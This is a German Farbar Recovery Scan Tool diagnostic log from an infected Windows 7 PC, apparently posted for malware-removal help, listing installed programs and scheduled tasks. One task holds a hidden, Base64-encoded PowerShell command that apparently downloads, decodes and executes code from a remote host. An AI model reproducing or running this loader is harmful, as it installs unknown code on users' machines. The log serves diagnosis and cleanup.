(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2015-12-22 23:24

==================== Ende von FRST.txt ============================

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:20-12-2015
durchgeführt von Özkan (2015-12-26 23:07:23)
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2013-07-29 18:30:24)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1539430812-113463742-2149372525-500 - Administrator - Disabled)
Gast (S-1-5-21-1539430812-113463742-2149372525-501 - Limited - Disabled) => C:\Users\Gast.EasyNote
HomeGroupUser$ (S-1-5-21-1539430812-113463742-2149372525-1010 - Limited - Enabled)
Özkan (S-1-5-21-1539430812-113463742-2149372525-1000 - Administrator - Enabled) => C:\Users\Özkan

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.228 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.3.133 - Adobe Systems, Inc.)
Broadcom Card Reader Driver Installer (HKLM\...\{4710662C-8204-4334-A977-B1AC9E547819}) (Version: 15.0.7.3 - Broadcom Corporation)
Broadcom NetLink Controller (HKLM\...\{C91DCB72-F5BB-410D-A91A-314F5D1B4284}) (Version: 15.0.7.1 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 4.04 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Druckerdeinstallation für EPSON WF-2540 Series (HKLM\...\EPSON WF-2540 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
ETDWare PS/2-X64 10.6.9.9_WHQL (HKLM\...\Elantech) (Version: 10.6.9.9 - ELAN Microelectronic Corp.)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Fraps (HKLM-x32\...\Fraps) (Version:  - )
GetDataBack for NTFS (HKLM-x32\...\{56582EEA-3AEF-4D84-8B9D-C87A3CD9250F}) (Version: 4.32.000 - Runtime Software)
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.2.1410 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2712 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{09536BA1-E498-4CC3-B834-D884A67D7E34}) (Version: 1.23.605.1 - Intel Corporation)
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.670 - Oracle)
Launch Manager (HKLM-x32\...\LManager) (Version: 5.1.15 - Packard Bell)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{929CE49F-1CA7-4CF3-A9A1-6D757443C63F}) (Version: 1.2.0241 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft-Maus- und Tastatur-Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 42.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 42.0 (x86 de)) (Version: 42.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 42.0 - Mozilla)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 3.0 - Qualcomm Atheros)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6543 - Realtek Semiconductor Corp.)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.14.14.201410081526 - Sony Mobile Communications AB)
Sony PC Companion 2.10.228 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.228 - Sony)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.42849 - TeamViewer)
Unity Web Player (HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\UnityWebPlayer) (Version: 5.0.3f2 - Unity Technologies ApS)
Unlocker 1.9.1-x64 (HKLM\...\Unlocker) (Version: 1.9.1 - Cedrick Collomb)
VLC media player 2.0.7 (HKLM\...\VLC media player) (Version: 2.0.7 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 4.20 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1539430812-113463742-2149372525-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll => Keine Datei

==================== Wiederherstellungspunkte =========================

19-12-2015 22:02:37 DirectX wurde installiert
20-12-2015 20:38:23 Windows-Sicherung
26-12-2015 22:50:24 Installed LogMeIn Hamachi

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2015-12-22 00:21 - 00000870 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {2F9EFD6F-C190-4C5F-91E4-8DC29081871B} - System32\Tasks\{1E300C01-90FD-450F-BD1E-62BCCA98B390} => Firefox.exe hxxp://ui.skype.com/ui/0/7.0.0.102/de/abandoninstall?source=lightinstaller&amp;page=tsBing
Task: {37CB84A8-AF35-4644-BC84-4A252074B883} - System32\Tasks\{DB07113B-F9D0-4E65-8E56-D804EE5D12B8} => pcalua.exe -a C:\Users\Özkan\Downloads\Setup_Lugiiis_Keybinder.exe -d C:\Users\Özkan\Downloads
Task: {5092819E-84BA-4BC9-869E-FAB88E5A99C3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: {5EBFB1F8-88B5-4AEB-9E89-26746BE7A02D} - System32\Tasks\{28325A84-A9DE-5181-98DC-72E8BE19248C} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGwAaQBrAGUAcgB1AHQALgBpAG4AZgBvAC8AdQAvAD8AcQA9AFAAbQBXAHoAQQB2AHYAeABfAGMAcABFAHkAZQA4AFoAUQBPAFcARgBIAHkAUABKAFgAcgBRAHkALQBLAGQAZgB4AG8AUwB6AEsAcABwADkAWQBsAGcAcgBpAEsASQBrAGgAaQBqAG0AYwBIAGkAawBpAHQAWgA5ADEAcQBZAGUAcwA3ADIAWgBwADQAXwBUAFgAMQBZAEEAQgBNAEgAYwBUAHkASQBVAGwAMwBUAEUAcABOAGoALQB3AE4AZwByAGIARgBJAE4ARwB5ADkAUQBPADcAVAA5ADMASQBkAG8AMQBoAHIARgBoADgANgBSAGIAdQBLAEkAZwA3AFMAUgBnAGgAYgBaAHcATQBsAE4ATAByAHgAZQBPAFkASAAzAEoAUgBQAF8ARQBFADEAVQBNADQAZABIAHcASABFAGoAcgBMAEoAYQBRAGMASwBhAEoAdQBiADEAaQBtADAAVQBrAEEAcABDAFoAawBhAHoAcABwAHcATQBnAHIAVQAzAEQASgBFAHoAZwBEADgAegAtAEMAUQAzADQAbwBlAGsAbAB4AFEATABsAGsALQBvADEAVgBOADUAOQBJAEEAZQBhAHkAcgBaAFEAUAB4AG4ASgBXAHEAZQA3ADgAUABfAGEATQBBAFcAeABrAGsAdwBXAFcANwBDAE4ASwB5AFAARABOAHkAaQBDADQATAB1ADkAbgBVADUARQBYAGIAdwBnAHcAUgBHAEkASABNAEYAOABrAGEASQBCAEwARgBlAGYAeABCAEIAawBCADEAWQBUADIASwBoAFoANQBHAHcAMwBnAF8AVQA2AFAAcAB0ADUAOQBxAFAANQBXAEsAagBsAEwAQQAzADIATAA1AE0ANABHADkAawA4AHUARwB2ADMAOQBTAHMAaABCADUAUABnAHkANQB5AGQANQBQAHMAaQBJAFUATgBHADgASAAwAEoAbgBIADEASgBNAGIAbABCAGIAUwB4AGwANQBVAHQATgBWAEgASAB0ADcAVAB1AEsAZgBlAGMAUABHAE8ANgBMAEYAYgBXAC0AbwA2ADYAcQB5AFUATwAxADgAcABRAEIASwBNAHoAawBOAHEAeAB4AEYAcgBXAE4AYwBSAGUAUQBuAEQAcwBsADYANwBkADEATQBwAHYAWgBNAEwAOABFAHAAMgBiAEwAYQBHAHQAcAA0AG4AZgB2AGkAMQBvAEQAOQBZAFcATgAzAFUAJgBjAD0ASwA1AHkARAB0AEoASgBqAGsAZwBGAEMATwAyAFcAcQBJAEsARwBLAEoAZgBsAGwAZwBoAFIAdgBNAFgANQA2AEgAcQBSAHAAMgAyAFAARwB4AFIARQA3AHEAYgBzAEMAVABFAHgAUwBvAG0AQgBnADUAZwBjAFgAUwByADQAZQBVAFQASABfAE8AQgBiAFIAMQAtAGcAeQAxAEsAUQBoAFgANwAzAGkAaABTAEIAXwB2AEEAXwBJAEgAdwB3ADYANABQAHIAVQBMADQAbABWAEIAcABEAFYAWAAzAFgAagBmAHIAUgA0ADkAQwBJAGEAOQBoADEAdgBHAFQAWABHADUAOQBYAEsAaQBQAF8AcwAzAFIAcgB5AG8AZgBpAEYASQBSAE4ATwBZAHIAMABmAFkANQBoAEYAbAAxAF8ATQBJAFgAdgBCAC0AZgA0AFAASQA5ADEAbQBnAGMAaQBpAEIAVgA4ADQAcQBOAEMAQwBsAFQAZwBWAHgAYQBoAC0AegBHAHcAcgBqAEsAYwBHADYAOQBKAFMASgBMAC0AbwBFAGMAdQBsAGcANwBDADEANQBFAFkAUABqAGwANwBNADEAcwBkAGcAcwBDAFIAawBYAFgAWQBLAHAARQBZAFkAcQBZAHIAVQB2AEgAaQB1AFQAaABtAHcAcQBtADcASgBfAHEASgA3AG8AZgBjAG4ANQA2AHEAaABTAHEAeAB0AGoAbQBfAHgAYwBQAHQAYQBXAHMASQB0ADIANgBvAHQATABiADYALQBYAHEAeQB4AF8ARwBtAHUAcQBVAGQASQB6AGIAegAyADQASQAyAHIAQgBnADgAdABJAGgAdABmAFkASQBCAEEAZgAwAFUAbABfAEgAYwBmAGMAbABsAEQAeABIAG8AZQA5AGwATABxADMAaABjAGMARAB6AFUAcwBzAEUAZAA2AEEARAByAHkAMQBBAEcAUQBIADAAbgB1AFIAZQBGAEwAQwAzAFgAMgBKAE4AMAAyAHYANwBaAG0AbABVAEUAdABpAEQARQBuAEwAWABFAFAAMABXAGgAdAA1AHgAdwB0AFMATABSAG8AUwAwAG0ATwBtAGgANAA2AE8ANwBXAHUAdwBZAHYAZAB5AGgAcgByADIAcwBKAEsAVwBrAFYAWABlADkAUABHAFIAeABtAG0AXwA2AEsASQBUAFkANAB2AEQAUQBqAFUAdAAyADYARQAzADMAdgBTAE4AbgBNAE8AUQBQAGQAZQBSAHYAQQB1ADQAYgBzAG8ANQBuAEIAOAAwAGYAOQBlADcAXwBZAGoAVABnAG8AUAByAGYATQBLAHQASwBxAGgAZQBtAFQAawAxAEoAWABEAEsANQBVAGsAMABDAHoATAB3ADYAQQB4AHQAMwBMAFYASQAzAHQANABJAGsARgB0AHkASwBEAHAANAAzAFEARwBSADEAQQBwADIAUABnAEcAMwBvAFUAZgBfADgAOQBfAHYAZgBoAGsATABxAFIAQQBVAE8AMQA1ADEAYQBWADgAWQBLAFIASgAtAEQAQQBsAE8AbQB4AEIAVQB5AFYAQwBUAGkAcQA1AHQAbAAxADAAdwBIAHcAOABHAGoAawBGAHIAbgBSAEQAZABLAGwARwBSAFAAdwBQAGkAUQBrAGEAYQBQADkAVQBGAEQAcgA0AEcAMwBEAEYAdQB2AFIAaAA4ADkASgBpAFoAQwB4AGEAQwBhAEcAdQAzADMAWQBxAEYAXwAtAHQAYwBpAFYAVQBnAGcARwBVADkAdABOAHoAdwB0ADkAJgByAD0AMQA2ADQAMwAwADAAOQAzADAAOQA4ADcAMwA3ADgANQAxADMANAAiADsAJABzAHQAcwBrAD0AIgB7ADIAOAAzADIANQBBADgANAAtAEEAOQBEAEUALQA1ADEAOAAxAC0AOQA4AEQAQwAtADcAMgBFADgAQgBFADEAOQAyADQAOABDAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {6547E57D-4808-40FB-9FA9-C1A592A6F982} - System32\Tasks\{BA18FF5F-EC80-4F08-B6A5-67790B43475D} => pcalua.exe -a "C:\Program Files (x86)\Plus-HD-5.0\Uninstall.exe" -c /fromcontrolpanel=1
Task: {6C3547A8-0D1D-4FDE-AEBA-6176B3E9FCD5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {8FB4BCDC-484E-4E5D-8A4F-4624732C64C5} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {9CDF866B-9C28-4409-A728-713E5A1BEA5A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {9FCCD376-FC5D-448B-849A-79A2205FF57C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-07-22] (Piriform Ltd)
Task: {A0968CD4-D421-49DB-9263-225E4A391C1C} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2015-12-15] (AVAST Software)
Task: {ACFF0C35-B6D7-4F3E-B0F0-613FC3D60A40} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {D97022AC-E5C8-4C9A-AD06-69969C655663} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {DD46DE76-7339-48AB-8295-84A25F09A341} - System32\Tasks\gg_uac_daemon_Özkan => C:\Users\Özkan\Documents\my games\PB\gamedata\ggdllhost.exe
Task: {DEDEDC1E-CAA1-43C4-B91B-2464B34057A5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-09] (Adobe Systems Incorporated)
